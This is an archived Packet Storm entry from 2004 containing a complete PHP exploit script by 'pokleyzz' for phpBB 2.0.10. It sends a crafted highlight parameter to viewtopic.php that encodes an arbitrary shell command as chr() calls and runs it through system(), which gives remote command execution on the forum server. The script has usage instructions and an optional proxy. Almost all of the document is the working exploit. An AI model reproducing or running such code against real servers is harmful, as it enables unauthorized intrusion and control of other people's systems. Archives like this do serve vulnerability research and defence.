phpbb.php.txt

2004-11-20T00:00:00
ID PACKETSTORM:35107
Type packetstorm
Reporter Pokleyzz
Modified 2004-11-20T00:00:00

Description

                                        
                                            `#!/usr/bin/php -q  
<?php  
/*  
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>  
# 15th November 2004 : 4:04 a.m  
#  
# bug found by How Dark (http://www.howdark.com) (1st October 2004)  
#  
# Requirement:  
#  
# PHP 4.x with curl extension;  
#  
# ** Selamat Hari Raya **  
*/  
  
if (!(function_exists('curl_init'))) {  
echo "cURL extension required\n";  
exit;  
}  
  
if ($argv[2]){  
$url = $argv[1];  
$command = $argv[2];  
}  
else {  
echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";  
echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n";  
echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";  
echo "\ttopic_id\t topic id\n";  
echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";  
exit;  
}  
if ($argv[3])  
$topic = $argv[3];  
else  
$topic = 1;  
  
if ($argv[4])  
$proxy = $argv[4];  
  
  
$cmd = str2chr($command);  
  
$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";   
$ch=curl_init();  
if ($proxy){  
curl_setopt($ch, CURLOPT_PROXY,$proxy);  
}  
curl_setopt($ch, CURLOPT_URL,$url.$action);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  
$res=curl_exec ($ch);  
curl_close ($ch);  
echo $res;  
  
function str2chr($str){  
  
for($i = 0;$i < strlen($str);$i++){  
$chr .= "chr(".ord($str{$i}).")";  
if ($i != strlen($str) -1)  
$chr .= "%252e";   
}  
return $chr;  
}  
?>`